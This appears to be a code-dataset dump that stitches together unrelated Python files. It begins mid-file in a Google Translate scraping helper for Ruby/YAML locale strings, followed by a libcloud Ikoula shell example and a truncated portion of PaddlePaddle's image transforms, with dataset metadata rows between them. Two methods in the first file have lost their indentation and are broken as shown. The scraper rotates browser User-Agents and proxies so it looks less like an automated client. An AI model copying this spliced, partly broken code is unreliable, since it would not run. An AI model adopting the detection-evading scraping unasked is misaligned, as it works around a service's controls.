        sentence_data = sentence_data + ' %{' + splitted_trans
    else:
        sentence_data = splitted_trans
    return sentence_data
def fix_hashruby_keep(self, sentence):
    """Translate *sentence* while keeping Ruby ``#{...}`` interpolation
    placeholders verbatim; only the plain text around them is sent to
    Google.
    """
    pieces = []
    position = 0
    for chunk in sentence.split('#{'):
        if chunk in (None, ''):
            # Leading or doubled '#{' produced an empty chunk: re-emit it.
            pieces.append(' #{')
        elif '}' in chunk:
            # Chunk starts with the placeholder name ('name} tail ...').
            fragments = chunk.split('}')
            tail = fragments[1]
            if tail in (None, ''):
                translated_tail = ''
            else:
                translated_tail = self._get_translation_from_google(tail)
            if position == 0:
                # First chunk precedes any '#{': no marker to restore.
                pieces.append(fragments[0] + '} ' + translated_tail)
            else:
                pieces.append(' #{' + fragments[0] + '} ' + translated_tail)
        else:
            # Plain text chunk with no brace: translate wholesale.
            pieces.append(self._get_translation_from_google(chunk))
        position += 1
    # str.split always yields at least one element, so the original's
    # "no chunks" branch was unreachable; the join is the normal path.
    return ''.join(pieces)
def fix_singlequote_keep(self, sentence):
    """Translate *sentence* chunk by chunk around single quotes.

    Empty chunks (leading/trailing or doubled quotes) re-emit a literal
    ``'``; every other chunk goes through ``original_work_distribute``.

    NOTE(review): a quote sitting between two non-empty chunks is not
    re-emitted, so ``a'b`` loses its quote -- confirm this is intended.
    """
    rebuilt = []
    for fragment in sentence.split("'"):
        if fragment in (None, ''):
            rebuilt.append("'")
        else:
            rebuilt.append(self.original_work_distribute(fragment))
    return ''.join(rebuilt)
def fix_doublequote_keep(self, sentence):
    """Translate *sentence* chunk by chunk around double quotes.

    Empty chunks (leading/trailing or doubled quotes) re-emit a literal
    ``"``; every other chunk goes through ``original_work_distribute``.

    NOTE(review): a quote sitting between two non-empty chunks is not
    re-emitted, so it disappears from the output -- confirm intended.
    """
    rebuilt = []
    for fragment in sentence.split('"'):
        if fragment in (None, ''):
            rebuilt.append('"')
        else:
            rebuilt.append(self.original_work_distribute(fragment))
    return ''.join(rebuilt)
def fix_enters_keep(self, sentence, tipo="\n"):
    """Translate *sentence* line by line, preserving the separator
    *tipo* (newline by default) between the translated parts.

    Unlike the sibling fix_*_keep methods, the counter here is bumped at
    the top of the loop, so the separator is re-appended after every
    non-final chunk.
    """
    print("fix_" + tipo + "_enters_keep", sentence)
    sentence_data = ""
    split_percent = sentence.split(tipo)
    pprint(split_percent)
    splitted_trans = ""
    count_split = 0
    for splitted in split_percent:
        count_split = count_split + 1
        print("simple splited_data", splitted)
        if splitted in (None, ''):
            # Empty chunk: consecutive separators -- keep one verbatim.
            print("adding enter")
            splitted_trans = splitted_trans + tipo
        else:
            print("work distribute", splitted)
            splited_data = self.original_work_distribute(splitted)
            print("work translated", splited_data)
            print("count_split", count_split)
            if count_split < len(split_percent):
                # Not the last chunk: restore the separator split() ate.
                splited_data = splited_data + tipo
                print("adding enter")
                print("work translated", splited_data)
            splitted_trans = splitted_trans + splited_data
    print("split_percent", split_percent)
    if count_split == 0:
        # Unreachable: str.split always yields at least one element.
        sentence_data = sentence_data + tipo + splitted_trans
    else:
        sentence_data = splitted_trans
    print("sentence_data", sentence_data)
    return sentence_data
def fix_html_keep(self, sentence):
    """Translate *sentence* while preserving HTML tags verbatim.

    The text is split on ``'<'``; tag contents up to the matching ``'>'``
    are copied through unchanged and the surrounding text is handed to
    ``fix_variable_keep`` (which in turn protects ``%{...}`` markers).
    """
    sentence_data = ""
    split_percent = sentence.split('<')
    splitted_trans = ""
    count_split = 0
    for splitted in split_percent:
        if splitted in (None, ''):
            # Empty chunk: leading or doubled '<'; re-emit the marker.
            splitted_trans = splitted_trans + ' <'
        else:
            if '>' in splitted:
                # Chunk starts with the tag body, e.g. 'b>text'.
                cut_other_part = splitted.split('>')
                # NOTE(review): only cut_other_part[1] is processed; text
                # after a second literal '>' in the chunk is dropped.
                second_part_split = cut_other_part[1]
                if second_part_split in (None, ''):
                    splited_data = ''
                else:
                    splited_data = self.fix_variable_keep(second_part_split)
                if count_split == 0:
                    # First chunk precedes any '<': no marker to re-emit.
                    splitted_trans = splitted_trans + cut_other_part[0] + '> ' + splited_data
                else:
                    splitted_trans = splitted_trans + ' <' + cut_other_part[0] + '> ' + splited_data
            else:
                # No '>' in chunk: plain text, placeholder-aware translate.
                splited_data = self.fix_variable_keep(splitted)
                splitted_trans = splitted_trans + splited_data
        count_split = count_split + 1
    if count_split == 0:
        # Unreachable: str.split always yields at least one element.
        sentence_data = sentence_data + ' <' + splitted_trans
    else:
        sentence_data = splitted_trans
    return sentence_data
def _get_translation_from_google(self, text):
    """Fetch the translation of *text* from Google and decode the reply.

    The decode/encode round trip validates that the response is UTF-8
    before it is handed to the JSON5 parser.

    Raises:
        GoogletTranslateException: error_codes[501] on network failure,
            error_codes[503] when the response cannot be decoded.
    """
    try:
        json5 = self._get_json5_from_google(text).decode('utf-8')
    except IOError:
        raise GoogletTranslateException(self.error_codes[501])
    except ValueError:
        raise GoogletTranslateException(self.error_codes[503])
    return self._get_translation_from_json5(json5.encode('utf-8'))
def _get_json5_from_google(self, text):
    """Request the translation of *text* from Google's endpoint and
    return the raw response body (bytes, JSON5-ish).

    A random desktop User-Agent is used per request; when
    ``self.proxyok == 'yes'`` the request is routed through the
    configured SOCKS5/SOCKS4/HTTP proxy, otherwise a direct
    ``urlopen`` is used.
    """
    escaped_source = quote(text, '')
    # Small pool of real browser User-Agents, rotated to look less like
    # an automated client.
    headerses = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0',
                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0',
                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/67.0',
                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) '
                 'Chrome/75.0.3770.100 Safari/537.36']
    headers = {'User-Agent': headerses[random.randrange(len(headerses))]}
    if self.proxyok == 'yes':
        # Proxy path: note there is no try/except here, so network
        # errors propagate to the caller (handled one level up).
        if self.proxytp == 'socks5':
            opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS5, self.proxyho, int(self.proxypo)))
        else:
            if self.proxytp == 'socks4':
                opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS4, self.proxyho, int(self.proxypo)))
            else:
                opener = build_opener(SocksiPyHandler(PROXY_TYPE_HTTP, self.proxyho, int(self.proxypo)))
        request_url = self.api_urls['translate'] + "&sl=%s&tl=%s&text=%s" % (
            self.source, self.target, escaped_source)
        print('request_url:' + request_url)
        req = Request(request_url, headers=headers)
        result = opener.open(req, timeout=2).read()
        # NOTE: local name `json` shadows the stdlib json module here.
        json = result
    else:
        try:
            request_url = self.api_urls['translate'] + "&sl=%s&tl=%s&text=%s" % (
                self.source, self.target, escaped_source)
            print('request_url 2:' + request_url)
            req = Request(request_url, headers=headers)
            result = urlopen(req, timeout=2).read()
            json = result
        except IOError:
            raise GoogletTranslateException(self.error_codes[501])
        except ValueError:
            # NOTE(review): if urlopen itself raised the ValueError,
            # `result` is unbound here and this raises NameError instead
            # of the intended exception -- confirm.
            raise GoogletTranslateException(result)
    return json
@staticmethod
def _get_translation_from_json5(content):
# print(content.decode('utf-8'))
response = content.decode('utf-8')
fixedJSON = re.sub(r',{2,}', ',', response).replace(',]', ']')
data = json.loads(fixedJSON)
# print(json.dumps(data, sort_keys=False, indent=2, separators=(',', ': ')))
result = data[0][0][0]
return result
@staticmethod
def _unescape(text):
return loads('"%s"' % text)
def filter_tags(self, htmlstr):
    """Strip HTML from *htmlstr*: drop CDATA/script/style blocks and
    comments, turn <br> into newlines, remove remaining tags, collapse
    blank lines and decode character entities.

    Fix: the patterns are now raw strings -- the originals relied on
    invalid escape sequences ('\\[', '\\s' in plain strings), which emit
    DeprecationWarning on modern Python; the compiled regexes are
    unchanged.
    """
    re_cdata = re.compile(r'//<!\[CDATA\[[^>]*//\]\]>', re.I)
    re_script = re.compile(r'<\s*script[^>]*>[^<]*<\s*/\s*script\s*>', re.I)
    re_style = re.compile(r'<\s*style[^>]*>[^<]*<\s*/\s*style\s*>', re.I)
    re_br = re.compile(r'<br\s*?/?>')
    re_h = re.compile(r'</?\w+[^>]*>')
    re_comment = re.compile(r'<!--[^>]*-->')
    s = re_cdata.sub('', htmlstr)
    s = re_script.sub('', s)
    s = re_style.sub('', s)
    s = re_br.sub('\n', s)          # line breaks become real newlines
    s = re_h.sub('', s)             # any other tag is dropped
    s = re_comment.sub('', s)
    blank_line = re.compile(r'\n+')
    s = blank_line.sub('\n', s)     # collapse runs of blank lines
    s = self.re_exp(s)              # second pass for leftover <...>
    s = self.replace_char_entity(s)
    return s
@staticmethod
def re_exp(htmlstr):
    """Remove every remaining <...> tag from *htmlstr*."""
    return re.sub(r'<[^<]+?>', '', htmlstr)
@staticmethod
def replace_char_entity(html_string):
    """Replace known HTML character entities (&nbsp;, &lt;, &#160;, ...)
    with their characters; unknown entities are removed entirely.

    Substitutions are applied one at a time, re-scanning from the start,
    so replacements that themselves form an entity (e.g. '&amp;nbsp;')
    are resolved recursively -- do not convert this to a single-pass sub.
    """
    char_entities = {'nbsp': ' ', '160': ' ',
                     'lt': '<', '60': '<',
                     'gt': '>', '62': '>',
                     'amp': '&', '38': '&',
                     'quot': '"', '34': '"', }
    entity_re = re.compile(r'&#?(?P<name>\w+);')
    match = entity_re.search(html_string)
    while match:
        name = match.group('name')
        replacement = char_entities.get(name, '')
        html_string = entity_re.sub(replacement, html_string, 1)
        match = entity_re.search(html_string)
    return html_string
@staticmethod
def fix_yml(original, html_string, target_language, source_language):
    """Post-process Google's translation of one YAML line.

    *original* is the source line, *html_string* its translation.
    Repairs: broken closing tags ("</ b>" -> "</b>"), the YAML key
    (copied back untranslated so only the value stays translated),
    un-spaced "%{", "},", ": >" markers, and the source line's leading
    indentation.

    NOTE(review): target_language / source_language are unused here --
    presumably kept for interface compatibility; confirm.
    """
    original_no_spaces = original.lstrip()
    original_key_is = original_no_spaces.split(':')
    key_has_spaces = original_key_is[0].split(' ')
    # Remember how much leading indentation the source line had.
    original_len = len(original)
    original_no_spaces_len = len(original_no_spaces)
    original_missing_spaces_len = original_len - original_no_spaces_len
    original_missing_spaces = ' ' * original_missing_spaces_len
    # Repair closing tags Google mangles into "</ b>" / "< / b>".
    s = re.compile(r'<[ ]{0,1}/ (?P<name>[a-zA-Z ]{1,})>')
    sz = s.search(html_string)
    while sz:
        entity = sz.group()  # unused; kept from the original loop body
        key = sz.group('name')
        try:
            html_string = s.sub(r'</' + key.lower().strip() + '>', html_string, 1)
            sz = s.search(html_string)
        except KeyError:
            # Looks unreachable -- s.sub does not raise KeyError here.
            sz = s.search(html_string)
    # this is a key in yml --> last_connection_html:
    # this is not a key in yml --> Dernière connexion sur le compte :
    if ':' in original and ':' in html_string and len(original_key_is) >= 2 and len(key_has_spaces) == 1:  # fix keep keys names
        print('yml key protection:' + original + ')')
        first_source_colon = original.find(':')
        keep_source_definition = original[:first_source_colon]
        first_translated_colon = html_string.find(':')
        keep_translated_text = html_string[(first_translated_colon + 1):]
        # Keep the untranslated key, attach only the translated value.
        html_string = keep_source_definition + ': ' + keep_translated_text.lstrip()
    print('original(' + original + ')')
    if '{' in original and '{' in html_string and '%' in original and '%' in html_string:  # fix % { to %{
        html_string = html_string.replace('% {', ' %{')
    if '},' in original and '} ,' in html_string:  # fix } , to },
        html_string = html_string.replace('} ,', '},')
    if ': >' in original and ':>' in html_string:  # fix :> to : >
        html_string = html_string.replace(':>', ': >')
    # restore white spaces (YAML is indentation-sensitive)
    html_string_no_spaces = html_string.lstrip()
    html_string_len = len(html_string)
    html_string_no_spaces_len = len(html_string_no_spaces)
    html_string_missing_spaces_len = html_string_len - html_string_no_spaces_len
    print('original_missing_spaces_len(' + str(original_missing_spaces_len) + ')')
    print('html_string_missing_spaces_len(' + str(html_string_missing_spaces_len) + ')')
    if original_missing_spaces_len > html_string_missing_spaces_len:
        html_string = original_missing_spaces + html_string
    print('html_string(' + html_string + ')')
    return html_string
@staticmethod
def fix_google(html_string):
    """Repair closing tags mangled by Google Translate.

    Google inserts spaces into closing tags ("</ b>", "< / STRONG>");
    each occurrence is rewritten to the canonical lowercase "</name>".
    Substitutions happen one at a time, re-scanning after each fix.
    """
    broken_close = re.compile(r'<[ ]{0,1}/ (?P<name>[a-zA-Z ]{1,})>')
    match = broken_close.search(html_string)
    while match:
        tag = match.group('name').strip().lower()
        html_string = broken_close.sub('</' + tag + '>', html_string, 1)
        match = broken_close.search(html_string)
    return html_string
if __name__ == "__main__":
    # Run this module's doctests when executed directly.
    import doctest
    doctest.testmod()
| 45.526882 | 132 | 0.528072 |
2e79fe5f8a5d389300f6630bccfaa2d6262d5553 | 437 | py | Python | docs/examples/compute/cloudstack/start_interactive_shell_ikoula.py | zimventures/libcloud | be0765df384f1baccde24539156119856cb96816 | [
"Apache-2.0"
] | 1,435 | 2015-01-07T05:32:51.000Z | 2022-03-25T19:39:34.000Z | docs/examples/compute/cloudstack/start_interactive_shell_ikoula.py | zimventures/libcloud | be0765df384f1baccde24539156119856cb96816 | [
"Apache-2.0"
] | 1,158 | 2015-01-04T18:08:42.000Z | 2022-03-24T14:34:57.000Z | docs/examples/compute/cloudstack/start_interactive_shell_ikoula.py | zimventures/libcloud | be0765df384f1baccde24539156119856cb96816 | [
"Apache-2.0"
] | 832 | 2015-01-05T09:20:21.000Z | 2022-03-24T19:22:19.000Z | import os
# pylint: disable=import-error
from IPython.terminal.embed import InteractiveShellEmbed
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
apikey = os.getenv('IKOULA_API_KEY')
secretkey = os.getenv('IKOULA_SECRET_KEY')
Driver = get_driver(Provider.IKOULA)
conn = Driver(key=apikey, secret=secretkey)
shell = InteractiveShellEmbed(banner1='Hello from Libcloud Shell !!')
shell()
| 24.277778 | 69 | 0.803204 |
1a3dbd68066a72384589ac24579e0540b5484a6e | 45,883 | py | Python | python/paddle/vision/transforms/transforms.py | zmxdream/Paddle | 04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c | [
"Apache-2.0"
] | 17,085 | 2016-11-18T06:40:52.000Z | 2022-03-31T22:52:32.000Z | python/paddle/vision/transforms/transforms.py | zmxdream/Paddle | 04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c | [
"Apache-2.0"
] | 29,769 | 2016-11-18T06:35:22.000Z | 2022-03-31T16:46:15.000Z | python/paddle/vision/transforms/transforms.py | zmxdream/Paddle | 04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c | [
"Apache-2.0"
] | 4,641 | 2016-11-18T07:43:33.000Z | 2022-03-31T15:15:02.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import math
import sys
import random
import numpy as np
import numbers
import types
import collections
import warnings
import traceback
from paddle.utils import try_import
from . import functional as F
# collections.abc split out of collections in Python 3.3; alias the ABCs
# so the rest of the module works on both layouts.
if sys.version_info < (3, 3):
    Sequence = collections.Sequence
    Iterable = collections.Iterable
else:
    Sequence = collections.abc.Sequence
    Iterable = collections.abc.Iterable

# Public API is exposed elsewhere; nothing is exported from this module.
__all__ = []
def _get_image_size(img):
    """Return (width, height) of a PIL Image, an HWC ndarray or a CHW
    tensor; raise TypeError for anything else."""
    if F._is_pil_image(img):
        return img.size
    if F._is_numpy_image(img):
        # ndarray layout is HWC: reverse the first two dims to get (w, h).
        return img.shape[:2][::-1]
    if F._is_tensor_image(img):
        # tensor layout is CHW: shape[1:] is (H, W), reversed to (w, h).
        return img.shape[1:][::-1]
    raise TypeError("Unexpected type {}".format(type(img)))
def _check_input(value,
name,
center=1,
bound=(0, float('inf')),
clip_first_on_zero=True):
if isinstance(value, numbers.Number):
if value < 0:
raise ValueError(
"If {} is a single number, it must be non negative.".format(
name))
value = [center - value, center + value]
if clip_first_on_zero:
value[0] = max(value[0], 0)
elif isinstance(value, (tuple, list)) and len(value) == 2:
if not bound[0] <= value[0] <= value[1] <= bound[1]:
raise ValueError("{} values should be between {}".format(name,
bound))
else:
raise TypeError(
"{} should be a single number or a list/tuple with lenght 2.".
format(name))
if value[0] == value[1] == center:
value = None
return value
class Compose(object):
    """Chain several transforms: calling the composition applies each
    transform in order to the input data.

    Args:
        transforms (list|tuple): callables applied in sequence.

    Examples:
        .. code-block:: python

            from paddle.vision.transforms import Compose, ColorJitter, Resize

            transform = Compose([ColorJitter(), Resize(size=608)])
    """

    def __init__(self, transforms):
        self.transforms = transforms

    def __call__(self, data):
        for transform in self.transforms:
            try:
                data = transform(data)
            except Exception as e:
                # Surface which transform failed before re-raising.
                stack_info = traceback.format_exc()
                print("fail to perform transform [{}] with error: "
                      "{} and stack:\n{}".format(transform, e, str(stack_info)))
                raise e
        return data

    def __repr__(self):
        parts = [self.__class__.__name__ + '(']
        for transform in self.transforms:
            parts.append('\n')
            parts.append('    {0}'.format(transform))
        parts.append('\n)')
        return ''.join(parts)
class BaseTransform(object):
    """Base class of all computer-vision transforms.

    Calling flow: ``_get_params`` runs once per call, then the matching
    ``_apply_<key>`` hook is applied to each input slot named in
    ``keys``. Subclasses implement the hooks they support; declaring a
    key with no matching hook raises ``NotImplementedError`` at
    construction time.

    Args:
        keys (list[str]|tuple[str], optional): names describing each
            element of the input tuple, e.g. ``("image",)`` (default),
            ``("image", "boxes")`` or ``("image", "mask")``. Conventional
            keys: "image" (H, W, C), "coords" (N, 2), "boxes" (N, 4,
            "xyxy"), "mask" (H, W, 1). Custom keys work as long as a
            matching ``_apply_<key>`` method exists.
    """

    def __init__(self, keys=None):
        if keys is None:
            keys = ("image", )
        elif not isinstance(keys, Sequence):
            raise ValueError(
                "keys should be a sequence, but got keys={}".format(keys))
        for key in keys:
            # Fail fast: every declared key needs an _apply_<key> hook.
            if self._get_apply(key) is None:
                raise NotImplementedError(
                    "{} is unsupported data structure".format(key))
        self.keys = keys
        # Per-call parameters shared between the _apply_* hooks.
        self.params = None

    def _get_params(self, inputs):
        # Subclasses may compute per-call (e.g. random) parameters here.
        pass

    def __call__(self, inputs):
        """Apply transform on single input data"""
        if not isinstance(inputs, tuple):
            inputs = (inputs, )
        self.params = self._get_params(inputs)

        outputs = []
        for idx in range(min(len(inputs), len(self.keys))):
            apply_func = self._get_apply(self.keys[idx])
            if apply_func is None:
                outputs.append(inputs[idx])
            else:
                outputs.append(apply_func(inputs[idx]))
        # Inputs beyond the declared keys pass through untouched.
        if len(inputs) > len(self.keys):
            outputs.extend(inputs[len(self.keys):])

        if len(outputs) == 1:
            return outputs[0]
        return tuple(outputs)

    def _get_apply(self, key):
        # Hook lookup by naming convention; None when unsupported.
        return getattr(self, "_apply_{}".format(key), None)

    def _apply_image(self, image):
        raise NotImplementedError

    def _apply_boxes(self, boxes):
        raise NotImplementedError

    def _apply_mask(self, mask):
        raise NotImplementedError
class ToTensor(BaseTransform):
    """Convert a ``PIL.Image`` or ``numpy.ndarray`` to a ``paddle.Tensor``.

    A (H x W x C) image becomes a (C x H x W) tensor by default; pass
    ``data_format='HWC'`` to keep the layout. Values are scaled from
    [0, 255] to [0.0, 1.0] for uint8 arrays and the standard PIL modes
    (L, LA, P, I, F, RGB, YCbCr, RGBA, CMYK, 1); other dtypes are
    converted without scaling. A grayscale (H x W) input becomes
    (1 x H x W).

    Args:
        data_format (str, optional): layout of the output tensor,
            'CHW' or 'HWC'. Default: 'CHW'.
        keys (list[str]|tuple[str], optional): same as ``BaseTransform``.
    """

    def __init__(self, data_format='CHW', keys=None):
        super(ToTensor, self).__init__(keys)
        self.data_format = data_format

    def _apply_image(self, img):
        """Convert *img* (PIL.Image | np.ndarray) to a tensor."""
        return F.to_tensor(img, self.data_format)
class Resize(BaseTransform):
    """Resize the input image to the given size.

    Args:
        size (int|list|tuple): target size. A (h, w) sequence is used
            as-is; an int resizes the smaller edge to that value while
            keeping the aspect ratio (if height > width the output is
            (size * height / width, size)).
        interpolation (int|str, optional): interpolation method name;
            the accepted values depend on the active backend (PIL:
            'nearest', 'bilinear', 'bicubic', 'box', 'lanczos',
            'hamming'; cv2: 'nearest', 'bilinear', 'area', 'bicubic',
            'lanczos'). Default: 'bilinear'.
        keys (list[str]|tuple[str], optional): same as ``BaseTransform``.
    """

    def __init__(self, size, interpolation='bilinear', keys=None):
        super(Resize, self).__init__(keys)
        size_ok = isinstance(size, int) or (
            isinstance(size, Iterable) and len(size) == 2)
        assert size_ok
        self.size = size
        self.interpolation = interpolation

    def _apply_image(self, img):
        return F.resize(img, self.size, self.interpolation)
class RandomResizedCrop(BaseTransform):
    """Crop a random region of the input and resize it to ``size``.

    A region covering a random fraction of the image area (``scale``)
    with a random aspect ratio (``ratio``) is sampled; after 10 failed
    attempts a central crop clipped to the nearest valid ratio is used.

    Args:
        size (int|list|tuple): output size (height, width); an int
            yields a square output.
        scale (list|tuple): area range of the crop relative to the
            source image. Default: (0.08, 1.0).
        ratio (list|tuple): aspect-ratio range of the crop.
            Default: (3/4, 4/3).
        interpolation (int|str, optional): interpolation method name
            (backend dependent). Default: 'bilinear'.
        keys (list[str]|tuple[str], optional): same as ``BaseTransform``.
    """

    def __init__(self,
                 size,
                 scale=(0.08, 1.0),
                 ratio=(3. / 4, 4. / 3),
                 interpolation='bilinear',
                 keys=None):
        super(RandomResizedCrop, self).__init__(keys)
        self.size = (size, size) if isinstance(size, int) else size
        assert (scale[0] <= scale[1]), "scale should be of kind (min, max)"
        assert (ratio[0] <= ratio[1]), "ratio should be of kind (min, max)"
        self.scale = scale
        self.ratio = ratio
        self.interpolation = interpolation

    def _get_param(self, image, attempts=10):
        """Sample (top, left, height, width) of the crop region."""
        width, height = _get_image_size(image)
        area = height * width

        for _ in range(attempts):
            # Log-uniform aspect ratio so e.g. 1/2 and 2 are equally likely.
            target_area = np.random.uniform(*self.scale) * area
            log_ratio = tuple(math.log(x) for x in self.ratio)
            aspect_ratio = math.exp(np.random.uniform(*log_ratio))

            crop_w = int(round(math.sqrt(target_area * aspect_ratio)))
            crop_h = int(round(math.sqrt(target_area / aspect_ratio)))

            if 0 < crop_w <= width and 0 < crop_h <= height:
                top = random.randint(0, height - crop_h)
                left = random.randint(0, width - crop_w)
                return top, left, crop_h, crop_w

        # Fallback: central crop clipped to the nearest valid ratio.
        in_ratio = float(width) / float(height)
        if in_ratio < min(self.ratio):
            crop_w = width
            crop_h = int(round(crop_w / min(self.ratio)))
        elif in_ratio > max(self.ratio):
            crop_h = height
            crop_w = int(round(crop_h * max(self.ratio)))
        else:
            # Image ratio already inside range: keep the whole image.
            crop_w = width
            crop_h = height
        top = (height - crop_h) // 2
        left = (width - crop_w) // 2
        return top, left, crop_h, crop_w

    def _apply_image(self, img):
        top, left, crop_h, crop_w = self._get_param(img)
        patch = F.crop(img, top, left, crop_h, crop_w)
        return F.resize(patch, self.size, self.interpolation)
class CenterCrop(BaseTransform):
    """Crop the input at its center.

    Args:
        size (int|list|tuple): output size (height, width); an int
            yields a square crop.
        keys (list[str]|tuple[str], optional): same as ``BaseTransform``.
    """

    def __init__(self, size, keys=None):
        super(CenterCrop, self).__init__(keys)
        if isinstance(size, numbers.Number):
            self.size = (int(size), int(size))
        else:
            self.size = size

    def _apply_image(self, img):
        return F.center_crop(img, self.size)
class RandomHorizontalFlip(BaseTransform):
    """Flip the input horizontally with probability ``prob``.

    Args:
        prob (float, optional): flip probability in [0, 1]. Default: 0.5.
        keys (list[str]|tuple[str], optional): same as ``BaseTransform``.
    """

    def __init__(self, prob=0.5, keys=None):
        super(RandomHorizontalFlip, self).__init__(keys)
        assert 0 <= prob <= 1, "probability must be between 0 and 1"
        self.prob = prob

    def _apply_image(self, img):
        # One RNG draw per call, flipped when it falls below prob.
        if random.random() >= self.prob:
            return img
        return F.hflip(img)
class RandomVerticalFlip(BaseTransform):
    """Mirror the input top-bottom with a given probability.

    Args:
        prob (float, optional): Probability of flipping; must lie in [0, 1].
            Default: 0.5.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): A vertically flipped image.

    Returns:
        A callable object of RandomVerticalFlip.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import RandomVerticalFlip

            transform = RandomVerticalFlip()
            fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
            print(fake_img.size)
    """

    def __init__(self, prob=0.5, keys=None):
        super(RandomVerticalFlip, self).__init__(keys)
        assert 0 <= prob <= 1, "probability must be between 0 and 1"
        self.prob = prob

    def _apply_image(self, img):
        # One uniform draw per image; flip iff it falls below the threshold.
        return F.vflip(img) if random.random() < self.prob else img
class Normalize(BaseTransform):
    """Normalize the input with per-channel mean and standard deviation.

    Given mean ``(M1,...,Mn)`` and std ``(S1,..,Sn)`` for ``n`` channels,
    each channel is transformed as
    ``output[channel] = (input[channel] - mean[channel]) / std[channel]``.

    Args:
        mean (int|float|list|tuple): Per-channel means. A scalar is applied
            to all three channels. Default: 0.0.
        std (int|float|list|tuple): Per-channel standard deviations. A scalar
            is applied to all three channels. Default: 1.0.
        data_format (str, optional): Layout of the image, 'HWC' or 'CHW'.
            Default: 'CHW'.
        to_rgb (bool, optional): Whether to convert to rgb. Default: False.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): A normalized array or tensor.

    Returns:
        A callable object of Normalize.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import Normalize

            normalize = Normalize(mean=[127.5, 127.5, 127.5],
                                  std=[127.5, 127.5, 127.5],
                                  data_format='HWC')
            fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
            fake_img = normalize(fake_img)
            print(fake_img.shape)
    """

    def __init__(self,
                 mean=0.0,
                 std=1.0,
                 data_format='CHW',
                 to_rgb=False,
                 keys=None):
        super(Normalize, self).__init__(keys)
        # Scalars are broadcast to all three channels.
        if isinstance(mean, numbers.Number):
            mean = [mean] * 3
        if isinstance(std, numbers.Number):
            std = [std] * 3
        self.mean = mean
        self.std = std
        self.data_format = data_format
        self.to_rgb = to_rgb

    def _apply_image(self, img):
        return F.normalize(img, self.mean, self.std, self.data_format,
                           self.to_rgb)
class Transpose(BaseTransform):
    """Permute the axes of the input into a target layout.

    Most transforms operate on HWC images while networks usually expect
    CHW tensors; the default order performs that HWC -> CHW permutation.
    PIL inputs are converted to ``numpy.ndarray`` first.

    Args:
        order (list|tuple, optional): Target axis order. Default: (2, 0, 1).
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(np.ndarray|Paddle.Tensor): A transposed array or tensor. A
          PIL.Image input yields an np.ndarray.

    Returns:
        A callable object of Transpose.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import Transpose

            transform = Transpose()
            fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
            print(fake_img.shape)
    """

    def __init__(self, order=(2, 0, 1), keys=None):
        super(Transpose, self).__init__(keys)
        self.order = order

    def _apply_image(self, img):
        # Tensors already expose a transpose with a compatible signature.
        if F._is_tensor_image(img):
            return img.transpose(self.order)
        # Materialise PIL images as ndarrays before permuting.
        if F._is_pil_image(img):
            img = np.asarray(img)
        # Promote grayscale (H, W) to (H, W, 1) so the permutation is valid.
        if img.ndim == 2:
            img = img[..., np.newaxis]
        return img.transpose(self.order)
class BrightnessTransform(BaseTransform):
    """Randomly adjust the brightness of the image.

    Args:
        value (float): How much to jitter brightness. Must be non-negative;
            0 leaves the image unchanged.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
        - output(PIL.Image|np.ndarray|Paddle.Tensor): An image with adjusted brightness.

    Returns:
        A callable object of BrightnessTransform.

    Examples:
        .. code-block:: python

            import numpy as np
            from PIL import Image
            from paddle.vision.transforms import BrightnessTransform

            transform = BrightnessTransform(0.4)
            fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
            fake_img = transform(fake_img)
    """

    def __init__(self, value, keys=None):
        super(BrightnessTransform, self).__init__(keys)
        # _check_input normalises the jitter amount into a (low, high) range,
        # or None when no adjustment should be applied.
        self.value = _check_input(value, 'brightness')

    def _apply_image(self, img):
        if self.value is None:
            return img
        factor = random.uniform(self.value[0], self.value[1])
        return F.adjust_brightness(img, factor)
class ContrastTransform(BaseTransform):
    """Randomly adjust the contrast of the image.

    Args:
        value (float): How much to jitter contrast. Must be non-negative;
            0 leaves the image unchanged.
        keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.

    Shape:
        - img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
